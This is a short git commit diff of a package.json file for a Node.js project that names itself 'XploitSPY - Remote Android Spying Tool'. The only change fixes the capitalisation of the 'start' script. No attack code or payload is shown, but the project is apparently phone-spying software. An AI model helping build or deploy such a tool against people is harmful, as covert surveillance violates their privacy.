This commit is contained in:
RaoMK 2020-02-21 13:17:00 +05:30
parent 7f106a4f6b
commit 2167196567

View File

@ -4,7 +4,7 @@
"description": "XploitSPY - Remote Android Spying Tool",
"main": "index.js",
"scripts": {
"Start": "node index.js",
"start": "node index.js",
"test": "node index.js"
},
"author": "XploitWizer",
@ -18,4 +18,4 @@
"lowdb": "^1.0.0",
"socket.io": "^2.2.0"
}
}
}